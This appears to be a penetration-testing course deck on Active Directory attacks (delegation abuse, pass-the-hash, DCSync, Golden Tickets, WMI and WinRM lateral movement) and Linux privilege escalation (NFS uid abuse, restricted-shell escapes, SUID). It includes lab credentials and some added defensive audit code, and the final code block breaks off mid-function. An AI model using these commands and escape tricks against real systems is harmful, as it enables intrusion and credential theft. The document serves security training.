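$posture.CredentialGuardRunning      = [bool]($dg -and ($dg.SecurityServicesRunning -contains 1))
[pscustomobject]$posture | Format-List

# Domain side (ActiveDirectory module; Protected Users needs a 2012 R2 domain functional level):
# privileged accounts outside Protected Users still authenticate with NTLM and can be passed-the-hash.
Import-Module ActiveDirectory -ErrorAction Stop
$protected = Get-ADGroupMember 'Protected Users' -Recursive -ErrorAction SilentlyContinue |
    Select-Object -ExpandProperty SamAccountName
foreach ($group in 'Domain Admins', 'Enterprise Admins', 'Administrators') {
    Get-ADGroupMember $group -Recursive |
        Where-Object { $_.objectClass -eq 'user' -and $protected -notcontains $_.SamAccountName } |
        ForEach-Object { [pscustomobject]@{ Group = $group; NotInProtectedUsers = $_.SamAccountName } }
}
```

LocalAccountTokenFilterPolicy = 1 or UseLogonCredential = 1 on a host are the two registry changes the earlier slides make from an elevated shell, so either value is worth an alert on its own.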
Windows Exploitation Status
● Domain controller for plum.local
● Host is a member of plum.local
● Through enumeration we found plum\bob is a valid account
● Gained RDP access via:
  ○ plum\bob (Summer18)
● Overcame AppLocker restrictions and can run PowerShell scripts
● Escalated privs and added local admin via weak service binary permissions
  ○ john (Password123!)
● Gained access to:
  ○ plum\kevin NTLM hash (via active sessions)
  ○ plum\backupsvc (%Qu1t3S3cUre3P@sS$) via LSASecrets
Active Directory
Active Directory Recon
• What data is useful?
– Domain password and account lockout policies
– Details on our account(s) and the permissions these have locally and within the domain
– Details on obvious customized admin enabled user accounts (adm_jsmith, localadmin etc.)
– Customized groups including nesting and inheritance
– Active Directory ACLs and delegated objects
– Password management tools/utilities (LAPS)
– Encrypted passwords in polices (Group Policy Preferences)
– Service accounts with SPNs (Kerberoasting)
– Sensitive data in scripts or config files (SYSVOL)
– Domain trusts and types
Active Directory Recon
ADRecon - https://github.com/sense-of-security/ADRecon
• Uses Microsoft Remote Server Administration Tools (RSAT) if installed; if not, it falls back to LDAP
• Enumerates users, groups, computers, OUs and various permission assignments, and generates useful
statistics
– From a non-domain joined host: .\ADRecon.ps1 -DomainController 192.168.3.215 -Credential plum\bob
Active Directory Recon
Bloodhound - https://github.com/BloodHoundAD/BloodHound
• Find the shortest path to domain pwnage!
• Invoke-BloodHound -CollectionMethod All -CompressData -RemoveCSV
Active Directory Delegation
Ummm dele-what?
"…Active Directory delegation is a critical part of many organisations' IT infrastructure. By
delegating administration, you can grant users or groups only the permissions they need without
adding users to privileged groups (e.g., Domain Admins, Account Operators)…"*
*[source] http://windowsitpro.com/active-directory/view-remove-ad-delegated-permissions
[further info] More information on AD delegation enumeration & attacks @
http://www.blackhat.com/html/webcast/05172018-active-directory-delegation-dissected.html
Active Directory Delegation
• What can be delegated?
– Read user information
– Create/manage users
– Create/manage groups
– Modify group membership
– Reset passwords
– + much more through custom assignments
• Custom tasks/permission assignments
– Extremely fine grained, allowing for very
specific delegation requirements
Active Directory Delegation: Why?
Why should we take an interest in how an environment has been delegated?
• Clued up organizations are minimizing the memberships of powerful groups such as
domain admins/enterprise admins. Instead (as designed) they are assigning various
delegation permissions such as ‘reset password’ to custom groups. If we compromise a
user from one of these groups, we inherit these potentially powerful permissions.
• We’re looking for mistakes, logical errors or even abuse ‘by design’ implementations.
• Redundant, legacy and weak configurations may be in place and all but forgotten.
Active Directory Delegation: Audit
• Useful tools:
– Remote Server Administration Tools (RSAT)
https://www.microsoft.com/en-gb/download/details.aspx?id=45520
– ADACL Scanner
https://github.com/canix1/ADACLScanner
– PowerView
https://github.com/PowerShellMafia/PowerSploit/tree/dev/Recon
– Windows attacking host with Admin Privileges (PowerShell)
Active Directory Delegation: Audit
• Where to go now? We have credentials (of some kind) for a number of users. It's worth seeing what
each has access to / rights within the domain:
– bob
– backupsvc
– kevin
• Users may hold 'standard' domain privileges, i.e. Finance users can access financial
applications/shared directories, whatever!
• …but what about delegation rights?
– Dsacls.exe (default on a DC / binary in the Support Tools)
– Active Directory Users and Computers MMC (advanced view enabled)
– PowerShell (many/varied methods)
Active Directory Delegation: ADACLScan
Active Directory Delegation: Enumeration
Useful AD cmdlets
$Env:ADPS_LoadDefaultDrive = 0 - load the Active Directory module without the default AD: drive
Import-Module ActiveDirectory
Get-ADUser - information on a specific domain user
Get-ADGroup - information on a specific group
Get-ADGroupMember - get group membership details
Get-ADPrincipalGroupMembership - get group membership details for a given user
New-ADUser - create a new domain user
Add-ADGroupMember - add a user to the specified group
Exercise | Demo 5.6 (Part 1)
• Identify an account that has delegation rights within the plum.local domain
• Gain access to this account (hint: we already have the necessary data)
• Using our newly inherited rights, add a new user named pwnedX to the domain
Note: Please don’t attempt to modify existing accounts (bob/kevin)
Exercise | Demo 5.6 (Part 1) Summary
Admin session > Mimikatz pth (as Kevin) > Kevin is a member of it_support
it_support has delegated rights over the Regions OU (and below)
Create the new pwnedX user under ou=regions,dc=plum,dc=local
Windows Exploitation Status
Domain controller for plum.local:
● Through enumeration we found plum\bob is a valid account
● Deduce that plum\ITSupport has delegation rights over the Regions OU
Windows 10 host (192.168.X.17):
● Host is a member of plum.local
● Gained RDP access via:
○ plum\bob (Summer18)
● Overcame AppLocker restrictions and can run PowerShell scripts
● Escalated privs and added local admin via weak service binary permissions
○ john (Password123!)
● Gained access to:
○ plum\kevin NTLM hash (via active sessions)
○ plum\backupsvc (%Qu1t3S3cUre3P@sS$) via LSASecrets
Active Directory Delegation
• So, if we find (and compromise) a member of it_support, can we:
– Reset passwords of a DA user?
– Add ourselves to privileged groups?
– err...afraid not
This is where AdminSDHolder and SDProp come in...
AdminSDHolder and SDProp
• AdminSDHolder is a container that exists in each AD domain
• A protected group is a group that is identified as privileged. This group and all its
members should be protected from unintentional modifications
• When a group is marked as protected; AD will ensure that the owner, the ACLs and
the inheritance applied on this group are the same as those applied on
AdminSDHolder container
https://social.technet.microsoft.com/wiki/contents/articles/22331.adminsdholder-protected-groups-and-security-descriptor-propagator.aspx
https://technet.microsoft.com/en-us/library/2009.09.sdadminholder.aspx
AdminSDHolder and SDProp
To view:
– ADSI Edit > Default Naming Context > DC=plum,DC=local > CN=System > CN=AdminSDHolder
– OR enable Advanced Features within dsa.msc
AdminSDHolder: Who/What?
Get-ADGroup -LDAPFilter "(admincount=1)" -Server 192.168.3.215 -Credential "plum\bob" | Select SamAccountName
Get-ADUser -LDAPFilter "(admincount=1)" -Server 192.168.3.215 -Credential "plum\bob" | Select SamAccountName
Active Directory Delegation: Targets?
• DA may not be the end goal - ask yourself “...what is it that I want to access?...”
– The compromised account may delegate rights over departmentalized groups,
i.e. Finance/HR/Development
– Locate juicy data/target
– Who has access?
– Do we have AD delegation rights over this object? (Yes: profit / No: keep looking)
Exercise | Demo 5.6 (Part 2)
• Gain access to the share “\\DC01\ITSupport$\Server Management” and obtain the
trophy
Note: Please don’t attempt to modify existing accounts (bob/kevin)
Exercise | Demo 5.6 (Part 2) Summary
Admin session > Mimikatz pth (Kevin) > Member of it_support
– it_support has delegated rights over the Regions OU (and below)
– Create new pwnedX user under ou=regions,dc=plum,dc=local
– Attempt to add pwnedX user to _the_privileged_few
– it_support has access to \\DC01\itsupport$, but not \\DC01\itsupport$\Server Management
– it_support & server_management have access to \\DC01\itsupport$
– Add pwnedX to the Server_Management group
– Server_management can access \\DC01\itsupport$\Server Management
Windows Exploitation Status
Domain controller for plum.local:
● Through enumeration we found plum\bob is a valid account
● Deduce that plum\ITSupport has delegation rights over the Regions OU
● Used plum\kevin to add a new user to the plum\server_management group and gain access to the “Server Management” directory under ITSupport$
Windows 10 host (192.168.X.17):
● Host is a member of plum.local
● Gained RDP access via:
○ plum\bob (Summer18)
● Overcame AppLocker restrictions and can run PowerShell scripts
● Escalated privs and added local admin via weak service binary permissions
○ john (Password123!)
● Gained access to:
○ plum\kevin NTLM hash (via active sessions)
○ plum\backupsvc (%Qu1t3S3cUre3P@sS$) via LSASecrets
Remote Services, Pivoting and Lateral
Movement
Knowing Your Environment: WOW64
• Windows 32 bit On Windows 64-bit
• x86 emulator that allows 32-bit Windows-based applications to run seamlessly on
64-bit Windows
• 32-bit processes cannot load 64-bit DLLs for execution, and 64-bit processes cannot
load 32-bit DLLs for execution
[Further info]: https://msdn.microsoft.com/en-us/library/windows/desktop/aa384249(v=vs.85).aspx
WOW64: For Pentesters
• Meterpreter won’t work to its full capacity:
– ‘hashdump’ and similar commands fail
– Local privilege escalation exploit fails
• The fix:
– Migrate to a 64bit process ‘migrate <pid>’
– Use a suitable payload, e.g. windows/x64/meterpreter/reverse_tcp
– Use a secondary metasploit exploit:
use windows/local/payload_inject
set payload windows/x64/meterpreter/reverse_tcp
Pivoting and Lateral Movement
• Leverage a compromised host to gain access to internal resources
• If we have a Meterpreter shell we can utilize its routing capabilities
route add 10.0.0.0 255.255.252.0 $SESSIONID
route print
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
10.0.0.0 255.255.252.0 $SessionID
Pivoting and Lateral Movement
• Running MSF modules over the pivot - it just works!
• But what about programs that are external to MSF?
• This is where a SOCKS proxy and Proxychains come in!
Pivoting and Lateral Movement
• Setup the SOCKS Proxy in MSF:
msf auxiliary(smb_version) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > set SRVPORT 1080
• Configure Proxychains to use the SOCKS Proxy server & port (/etc/proxychains.conf)
• Precede any command with ‘proxychains’ and traffic will be routed appropriately
proxychains nmap -Pn -sT 10.0.2.220 -p445 -nvvv
|S-chain|-<>-127.0.0.1:1080-<><>-10.0.2.220:445-<><>-OK
PORT STATE SERVICE REASON
445/tcp open microsoft-ds syn-ack
Knowing Your Environment: Services
• Useful services for lateral movement within a network:
– WMI (TCP 135 > random port then selected for further comms)
– SMB (TCP 139 / 445)
– RDP (TCP 3389)
– WinRM / PowerShell Remoting (TCP 5985 for HTTP & 5986 for HTTPS)
Knowing Your Environment: WinRM
• WinRM authentication mechanisms: https://msdn.microsoft.com/en-us/library/aa384295(v=vs.85).aspx
– Basic
– Digest
– Negotiate
– Kerberos (default in a domain environment / must use hostname not IP)
– Client Certificate
• Verify if the WinRM service is running on a remote system
Test-WSMan $hostname.plum.local
Knowing Your Environment: WinRM
• Making a connection:
Invoke-Command -ScriptBlock { whoami } -ComputerName $target.plum.local
• In some circumstances we may be forced to use an HTTPS session - remember, by default this is over TCP 5986
– Force SSL: -UseSSL
– Force the port: -Port 5986
• If SSL is in place it is likely that the target has been issued a self-signed certificate:
– Skip CA checks (defined as a session option): New-PSSessionOption -SkipCACheck -SkipRevocationCheck
Knowing Your Environment: WMI
“...The Windows Management Instrumentation Command-line (WMIC) is a command-line and scripting interface that simplifies the use of Windows Management Instrumentation (WMI) and systems managed through WMI. WMIC is based on aliases...”
[source] https://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/wmic.mspx?mfr=true
Knowing Your Environment: WMI
• A simple command may resemble:
wmic useraccount get name,sid
• Using the /node switch it’s also possible to run queries against remote hosts
(assuming permissions allow):
wmic /node:192.168.X.X /user:'plum\administrator' /password:'XXXXXXX' useraccount get name,sid
Knowing Your Environment: WMI
• WMIC process call create can be used to run commands on a host
Popping calc.exe because we’re 1337!
wmic /node:192.168.X.X process call create "calc.exe"
Or maybe running a command on the host would be more beneficial...
wmic /node:192.168.X.X /user:'plum\administrator' /password:'XXXXXXX' process call create "cmd.exe /c $DoSomethingEvil"
• Back in the Post Exploitation module we looked at some WMI capable tools
Exercise | Demo 5.7 (Part 1)
• Use Kali to gain a Meterpreter session on the Windows 10 host 192.168.X.17
• Use this session to identify a host on the 10.0.2.0/24 network (hint it’s not .215)
• Find the hostname and operating system version of the identified host
• Using nmap, determine which ports are open on the host
Exercise | Demo 5.7 (Part 2)
• Return to the RDP session on your Windows 10 host and target a service that allows remote
connectivity and gain privileged shell access on the host within the 10.0.2.0/24 network
• Extract clear text passwords from the host
* NOTE: In exercise 5.6 (part 2) you extracted a certificate from “\\DC01\ITSupport$\Server Management” that will be used within this exercise. You will need to import this into the Windows 10 host (192.168.X.17) as a user certificate
In preparation for this, the following registry additions have been made to the target host:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy set to 1
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential set to 1
WinRM: FAILSAFE
If, for any reason, you have not managed to gain access to the host 10.0.2.220 via
WinRM/PowerShell Remoting, the following failsafe has been put into place. This
account can be used to complete flag 2 in exercise 5.7 “Extract clear text passwords
from the host”
• Username: .\backup_account
• Password: Password12345!
Windows Exploitation Status
Domain controller for plum.local:
● Through enumeration we found plum\bob is a valid account
● Deduce that plum\ITSupport has delegation rights over the Regions OU
● Used plum\kevin to add a new user to the plum\server_management group and gain access to the “Server Management” directory under ITSupport$
Windows 10 host (192.168.X.17):
● Host is a member of plum.local
● Gained RDP access via:
○ plum\bob (Summer18)
● Overcame AppLocker restrictions and can run PowerShell scripts
● Escalated privs and added local admin via weak service binary permissions
○ john (Password123!)
● Gained access to:
○ plum\kevin NTLM hash (via active sessions)
○ plum\backupsvc (%Qu1t3S3cUre3P@sS$) via LSASecrets
● Found a 2nd interface on the network 10.0.0.0/22
New host certsrv (10.0.2.220):
● Discovered new host certsrv (10.0.2.220)
● Extracted credentials from active sessions:
○ plum\godmode (1@mth30n3)
Post Exploitation & Persistence Techniques
Persistence: LOLBins
• Living Off The Land Binaries | *https://github.com/api0cradle/LOLBAS
• Useful for policy bypasses/persistence
• *Can be used to perform other actions than what the binary was intended to do:
– Execute code
– Download/upload files
– Bypass UAC
– Compile code
– Get creds/dumping process
– Surveillance (keylogger, network trace)
– Evade logging/remove log entry
– Side-loading/hijacking of DLL
– Pass-through execution of other programs or scripts
– Persistence (Hide data in ADS, execute at logon etc)
Post Exploitation: DCSync
• Mimikatz DCSync can be used to impersonate a Domain Controller
• Code is not run on the DC
• Successful exploitation allows access to user password history
• We need privileges to be able to do this:
– Domain Admin
– Enterprise Admin
– Domain Controller
– OR an account with the following two permissions set (set via ADSI Edit):
Post Exploitation: DCSync
• Example: plum\alice has these two permissions - now revoked before you get ideas ;-)
• A nice article on prevention/lockdown
http://www.cyber-security-blog.com/2016/08/how-to-lockdown-active-Directory-to-thwart-use-of-mimikatz-dcsync.html
Persistence: Kerberos (simplified)
Normal Kerberos Authentication
1. AS_REQ: User authenticates with KDC
2. AS_REP: If auth is successful the KDC issues a TGT
a. TGT includes account name, role info, group
membership details (PAC)
b. Only the krbtgt account can read this
3. TGS_REQ: The TGT is used to request a service ticket
a. TGT from stage 2 (KDC verifies PAC and checksum)
4. TGS_REP: PAC copied to new service ticket. New TGS
ticket returned to client
5. AP_REQ: TGS ticket is used to authenticate to xyz server
[Image source] https://redmondmag.com/articles/2012/02/01/understanding-the-essentials-of-the-kerberos-protocol.aspx
Persistence: Golden Ticket
Golden Tickets: Overview
• The Kerberos TGT is encrypted and signed by the KRBTGT account
• The lifetime of tickets is defined within Kerberos policies; by default this stands at 10 hours
The Attack:
If we have access to any of the following we can create, encrypt and sign our own tickets!
KRBTGT NTLM Hash
AES128 HMAC Encryption Key
AES256 HMAC Encryption Key
Persistence: Golden Ticket
Normal Kerberos Authentication Kerberos and Golden Tickets
Persistence: Golden Ticket
• Requirements:
– FQDN of the target domain
– The domain SID
– NTLM hash of the KRBTGT account
• The target account doesn’t even have to be a legitimate user!
• Because the KDC trusts any TGT it can decrypt with the KRBTGT key, we can create a ticket with a custom lifetime that exceeds the aforementioned policies - up to a maximum of 10 years!
• Golden tickets can be created using the KRBTGT hash until the password for the account is changed twice
Persistence: AdminSDHolder and SDProp
Remember seeing this container in the Active Delegation Slides?
• SDProp runs every 60 mins (by default)
• ‘Clones’ the ACL of AdminSDHolder to protected objects (AdminCount=1)
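As an added illustration of the SDProp rule on this slide and the AdminSDHolder slides earlier (not course material and not real AD code), the following small model copies the AdminSDHolder ACL onto adminCount=1 objects and shows both why a delegated OU-level ACE does not survive on a protected group and why an ACE placed on AdminSDHolder itself keeps reappearing; every name, DN and ACE below is constructed.

```python
"""Model of the SDProp/AdminSDHolder behaviour described on the slides.

Objects with adminCount=1 get the ACL of CN=AdminSDHolder cloned over them on
every SDProp run. All names, DNs and ACEs are constructed for the demo.
"""
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Ace:
    trustee: str
    right: str  # e.g. "GenericAll", "WriteMembers", "ResetPassword"


@dataclass
class AdObject:
    dn: str
    admin_count: int
    aces: set = field(default_factory=set)
    inheritance_enabled: bool = True


def sdprop_run(admin_sd_holder, objects):
    """One SDProp pass: clone the AdminSDHolder ACL onto every protected object.

    Returns the DNs whose security descriptor was rewritten.
    """
    changed = []
    for obj in objects:
        if obj.admin_count != 1:
            continue  # only adminCount=1 objects are protected
        if obj.aces != admin_sd_holder.aces or obj.inheritance_enabled:
            obj.aces = set(admin_sd_holder.aces)
            obj.inheritance_enabled = False  # SDProp also switches inheritance off
            changed.append(obj.dn)
    return changed


def has_right(obj, trustee, right):
    """True if trustee holds the named right (or GenericAll) on obj."""
    return Ace(trustee, right) in obj.aces or Ace(trustee, "GenericAll") in obj.aces


def unexpected_aces(admin_sd_holder, baseline):
    """Defensive check: ACEs on AdminSDHolder that are not in the recorded baseline."""
    return sorted(admin_sd_holder.aces - baseline, key=lambda a: (a.trustee, a.right))


def demo():
    """Walk through the course scenario and return the observations as a dict."""
    baseline = {Ace("plum\\Domain Admins", "GenericAll"),
                Ace("NT AUTHORITY\\SYSTEM", "GenericAll")}
    admin_sd_holder = AdObject("CN=AdminSDHolder,CN=System,DC=plum,DC=local", 0,
                               set(baseline), False)

    # it_support was delegated WriteMembers over the Regions OU. An unprotected group
    # inherits that ACE; assume someone also stamped it onto a protected group by hand.
    delegated = Ace("plum\\it_support", "WriteMembers")
    regional = AdObject("CN=finance_team,OU=Regions,DC=plum,DC=local", 0, {delegated})
    privileged = AdObject("CN=_the_privileged_few,CN=Users,DC=plum,DC=local", 1,
                          set(baseline) | {delegated})  # DN constructed

    out = {"delegate_on_protected_before":
           has_right(privileged, "plum\\it_support", "WriteMembers")}
    sdprop_run(admin_sd_holder, [regional, privileged])
    out["delegate_on_protected_after"] = has_right(privileged, "plum\\it_support", "WriteMembers")
    out["delegate_on_unprotected_after"] = has_right(regional, "plum\\it_support", "WriteMembers")

    # Persistence angle: an ACE added to AdminSDHolder itself is pushed out on the next run,
    # which is why the AdminSDHolder ACL should be compared against a baseline regularly.
    admin_sd_holder.aces.add(Ace("plum\\pwnedX", "GenericAll"))
    sdprop_run(admin_sd_holder, [regional, privileged])
    out["extra_ace_on_protected"] = has_right(privileged, "plum\\pwnedX", "WriteMembers")
    out["unexpected_on_adminsdholder"] = [f"{a.trustee}:{a.right}"
                                         for a in unexpected_aces(admin_sd_holder, baseline)]
    return out
```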
Persistence: AdminSDHolder and SDProp
[Further info] https://adsecurity.org/?p=1906
Persistence: DCShadow
• Create and register a rogue Domain Controller
• Inject malicious objects into the environment
• Presented at BlueHat 2018 - http://www.bluehatil.com/files/Active Directory What Can Make Your Million Dollar SIEM Go Blind.pdf
*[source] dcshadow.com - as of June 2018
LAB Time Challenges (5.8 & 5.9)
Exercise 5.8:
• Using the privileged account ‘godmode’, gain a Meterpreter shell on the Domain
Controller (192.168.3.215) without using SMB
Exercise 5.9:
• Create a Golden Ticket on the plum.local domain
• Impersonate a Domain Controller and gain access to domain password hashes
• Find the clear text password for the user account jenny
Windows Exploitation Status
Domain controller for plum.local:
● Through enumeration we found plum\bob is a valid account
● Deduce that plum\ITSupport has delegation rights over the Regions OU
● Used plum\kevin to add a new user to the plum\server_management group and gain access to the “Server Management” directory under ITSupport$
● Gained shell on host using plum\godmode and WMIC process call create
● Created a golden ticket with 10 year lifespan
● Gained access to clear text password for plum\jenny via DCSync as this account uses reversible encryption
Windows 10 host (192.168.X.17):
● Host is a member of plum.local
● Gained RDP access via:
○ plum\bob (Summer18)
● Overcame AppLocker restrictions and can run PowerShell scripts
● Escalated privs and added local admin via weak service binary permissions
○ john (Password123!)
● Gained access to:
○ plum\kevin NTLM hash (via active sessions)
○ plum\backupsvc (%Qu1t3S3cUre3P@sS$) via LSASecrets
● Found a 2nd interface on the network 10.0.0.0/22
New host certsrv (10.0.2.220):
● Discovered new host certsrv (10.0.2.220)
● Extracted credentials from active sessions:
○ plum\godmode (1@mth30n3)
Network Status: After Windows Exploitation
Module 6
Hacking *nix
The Basics
• Everything is a file
• The root user (id=0) has access to all files
• Home Folder (~) locations are identified at paths such as /home/<username> and
/root for root user
• Configuration files
– /etc: system wide configuration (generally readable, except files holding credentials)
– /home/<username>/: user specific configuration (reachable by user and root)
• Passwords
– /etc/passwd: contains user details
– /etc/shadow: contains salted password hashes
Linux Enumeration and Exploitation
Finger
• Listens on TCP port 79
• The Finger program provides status reports on a particular computer system
or a particular person
• The program can supply information such as whether a user is currently
logged-on, e-mail address, full name etc.
• As well as standard user information, finger displays the contents of the
.project and .plan files in the user's home directory
– This could, at times, reveal “juicy” information
Exercise | Demo 6.1
• What services are listening on host 192.168.X.209?
• Identify users present on the system using the finger service
SSH
• Remote administration service
• Provides ‘secure’ equivalent of Telnet and offers data encryption
• Common types of SSH authentication mechanisms:
– Password based authentication is the most widely deployed and targeted in
hacking world!
– Key/hosts based, GSSAPI, Others.
• SSH versions:
– v1 (deprecated now - inherent weaknesses such as insecure integrity
checksums, MiTM attack susceptibility)
– v2 (the latest version in use. If the server strings show v1.99, this means both
versions are supported)
SSH Key Authentication
• Create a public/private key pair
• Upload public key to remote servers /home/user/.ssh/authorized_keys
– NOTE: authorized_keys file should not be world writable
• Authenticate with your private key
– NOTE: private key should only be readable by the user
NFS
• Network File System (NFS) allows folders to be shared across the
network
• Share permissions are vital to the security of the NFS host
• Configuration file: /etc/exports
• To view a remote NFS share: showmount -e <IP>
• To mount a share:
mount -o nolock 192.168.X.209:/nfs_share_name /mnt/nfs
NFS: Permissions
• Once the NFS share is mounted you can read/write files (if NFS
permissions allow so)
– Which user can read/write files will depend on the uid/gid of the folder/file
– As you have root access on your system (Kali); you can create a user locally with
a matching uid/gid and then read/write files on the remote share that is mapped
locally on your Kali host!
Exercise | Demo 6.2
• On what port is NFS listening on the host 192.168.X.209?
• What is the share exported by the NFS Server?
• Identify a vulnerability related to the exported NFS directories which
we may be able to ‘abuse’ and then login to the remote host using SSH
SSH/NFS: FAILSAFE
If, for any reason, you have not managed to gain SSH access as foo2, the following
failsafe has been put into place
• Username: foo2
• Password: 2in1@foo2
IMPORTANT: Within the following challenges you will be required to substitute the
SSH key for this password
Restricted Shells
• Shell access can be further restricted by use of restricted shells
– Pre-packaged restricted shells such as rbash
– Homegrown or written from scratch in perl / python (lshell)
• Each has its own strengths and weaknesses
– rbash: disallows / in commands, but at the same time if path contains the
command it doesn’t stop it from executing
– lshell: performs command parsing and hence vulnerable to logic bugs
Restricted Shell: Escape Examples
• VIM
– !sh : will escape to shell
• Nmap
– (<4.2 version) Nmap --interactive can allow you to gain elevated privilege if Nmap is
allowed to run as root
– Assuming nmap can be run as a privileged user; we could create a nse script that can
then be invoked to achieve code execution under the context of this privileged
account
• Tcpdump
echo "id" > /tmp/test3; chmod +x /tmp/test3; sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/test3 -Z root
More Fun : http://0x90909090.blogspot.in/2015/07/no-one-expect-command-execution.html
SUID Files
• Executes with uid of the owner of the file(s) and not with the permission of user
executing it
• Creating a SUID & SGID file
– chmod 6755 file_name
– Interpreted code starting with #! even if SUID bit is set, will not be executed
with inherited privilege (i.e. scripts will be ignored)
– Bash by default drops privileges to calling user, use -p to retain permissions
euid to uid
• euid (effective user id)?
• euid = 0 = root = game over!
• While euid is good, we really want to have uid as the victim
user
euid to uid: Example
• sudo -l lists the allowed commands for the invoking user on the current host
• The invoking user is derived based on uid, not euid
• Thus it's always worthwhile gaining the same uid as euid
euid to uid: Example
• An example of a simple C program to start bash with euid/egid privileges
Prototype: setreuid(uid_t ruid, uid_t euid);

#include <sys/types.h>
#include <unistd.h>

int main(void)
{
    /* Make the real uid/gid equal to the effective ones inherited from the
       SUID/SGID binary, so anything that checks the real uid (sudo -l,
       for example) sees the target user. -1 leaves the effective id unchanged. */
    setreuid(geteuid(), -1);
    setregid(getegid(), -1);
    char *args[] = {"/bin/bash", 0};
    /* bash only drops privileges when euid != uid; they now match, so no -p is needed */
    execve(args[0], args, 0);
    return 0;
}

Interesting Read: http://yarchive.net/comp/setuid_mess.html
Shell Games: Non-Interactive to Interactive
If you obtain a reverse shell via nc or similar methods you might end up
getting a non-interactive shell
• You don’t see the prompt.
• Commands like “clear” or “^L” or “ssh” fail with “must be run from
terminal”
Some options to gain an interactive shell include:
• python -c 'import pty; pty.spawn("/bin/bash")'
• perl -e 'exec "/bin/sh";'
• /bin/sh -i
Exercise | Demo 6.3
Identify a security misconfiguration and perform following:
• Execute ifconfig as user foo2 and store the output (by breaking out of
restricted shell as foo2 user)
• Elevate yourself to foo user
• Obtain SSH access as foo user (using the trick applied as part of 6.2)
• Obtain output of /etc/pwn1.txt as user foo using the SSH shell
Bonus:
• Identify alternative breakout scenarios
SSH: FAILSAFE
If, for any reason, you have not managed to gain SSH access as foo, the following
failsafe has been put into place
• Username: foo
• Password: AIH@foo4321
IMPORTANT: Within the following challenges you will be required to substitute the
SSH key for this password
More Breakout / Elevation options: GTFObins
• List of binaries to bypass local security protections
• https://gtfobins.github.io/
• Inspired by LOLBins project on Windows
• Binaries can be used to perform a wide range of actions
– Interactive execute
– Non-interactive reverse shell
– Non-interactive bind shell
– File write
– File read
– Sudo
– Limited SUID
NFS: Security
• NFS exports/shares should be kept in a separate disk partition
• Partition should be mounted with “nosuid” and “noexec”
perms via /etc/fstab
– “nosuid” implies SUID files cannot be configured on a NFS share
– “noexec” implies files cannot be executed from the NFS share
Example: <UUID> /ABC auto nosuid,nodev,nofail,x-gvfs-show,noexec 0 0
• NFS Share should have root_squash enabled [default_config]
– “root_squash” prevents remote root users from having root
privileges and assigns them ‘nobody’ permissions (default)
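An added example, not course material, that turns the checks from this slide and the NFS Permissions slide into a small audit: it parses the exports(5) line format and flags exports without root_squash, with a wildcard client or with the insecure option, and checks an fstab line for nosuid/noexec/nodev. The file contents below are constructed samples.

```python
"""Audit /etc/exports and fstab mount options for the weak NFS settings discussed.

The exports and fstab contents used here are constructed samples.
"""
import re
from dataclasses import dataclass

SAMPLE_EXPORTS = """\
# constructed sample /etc/exports
/srv/nfs_share_name 192.168.3.0/24(rw,sync,no_root_squash)
/srv/public         *(ro,sync)
/srv/backup         10.0.2.0/24(rw,insecure,no_subtree_check)
/srv/safe           192.168.3.215(rw,sync,root_squash)
"""

REQUIRED_MOUNT_OPTS = {"nosuid", "noexec", "nodev"}

# one client spec: 'client' or 'client(opt,opt,...)'
_CLIENT_SPEC = re.compile(r"(\S+?)(?:\(([^)]*)\))?$")


@dataclass(frozen=True)
class Export:
    path: str
    client: str
    options: tuple


@dataclass(frozen=True)
class Finding:
    path: str
    client: str
    issue: str


def parse_exports(text):
    """Expand every '/path client(opts)' pair in an exports file, in file order."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        path, specs = fields[0], fields[1:]
        if not specs:
            specs = ["*"]  # a bare path is exported to every client with default options
        for spec in specs:
            m = _CLIENT_SPEC.match(spec)
            opts = tuple(o.strip() for o in (m.group(2) or "").split(",") if o.strip())
            exports.append(Export(path, m.group(1), opts))
    return exports


def audit_exports(text):
    """Return one Finding per weak setting found in an exports file."""
    findings = []
    for e in parse_exports(text):
        opts = set(e.options)
        if "no_root_squash" in opts:
            findings.append(Finding(e.path, e.client,
                                    "no_root_squash: remote root keeps uid 0 on the share"))
        if e.client == "*":
            findings.append(Finding(e.path, e.client,
                                    "wildcard client: any host may mount the export"))
        if "insecure" in opts:
            findings.append(Finding(e.path, e.client,
                                    "insecure: requests from unprivileged source ports accepted"))
    return findings


def missing_mount_hardening(fstab_line):
    """Return the hardening options absent from one fstab line (4th field = mount options)."""
    fields = fstab_line.split()
    if len(fields) < 4:
        raise ValueError("fstab line needs at least four fields")
    present = set(fields[3].split(","))
    return sorted(REQUIRED_MOUNT_OPTS - present)
```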
rservices
● Legacy services:
○ rexec (512/tcp)
○ rlogin (513/tcp)
○ rsh (514/tcp)
● Security problems:
○ Lack of encryption
○ Brute force susceptibility
○ RSH connection spoofing (ADMspoof)
rservices
● rservices use standard PAM modules, however, access control is
overridden by the following configuration files:
○ /etc/hosts.equiv
○ ~/.rhosts
● Config file format/description/example:
○ /etc/hosts.equiv containing “mypc bob” implies that user Bob is allowed to connect
to this host from the host mypc
○ Similarly, “+ bob” means bob is allowed to connect to this host from any machine
/etc/hosts.equiv (system wide) supersedes the following…
/home/user/.rhosts (user specific)
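The trust-file rules above, as an added example that is not part of the course: a parser for hosts.equiv and .rhosts lines, a check of who may rlogin as whom, and an audit helper for "+" wildcards. Two details are assumed from classic rlogind behaviour rather than taken from the slide (a host-only line requires the same username on both ends, and hosts.equiv is skipped for root); netgroups and "-" entries are not modelled, and the file contents are constructed.

```python
"""Evaluate and audit rservices trust files (/etc/hosts.equiv and ~/.rhosts).

Simplified model: each line is 'host [user]', '+' in either field is a wildcard,
and /etc/hosts.equiv is consulted before the target account's ~/.rhosts.
The file contents are constructed samples.
"""
from dataclasses import dataclass
from typing import Optional

HOSTS_EQUIV = """\
# constructed sample /etc/hosts.equiv
mypc bob
+ bob
fileserver
"""

RHOSTS_FOO2 = """\
# constructed sample /home/foo2/.rhosts
kali foo2
+ +
"""


@dataclass(frozen=True)
class TrustEntry:
    host: str
    user: Optional[str]  # None means a host-only line


def parse_trust_file(text):
    """Parse 'host [user]' lines; comments and blank lines are skipped."""
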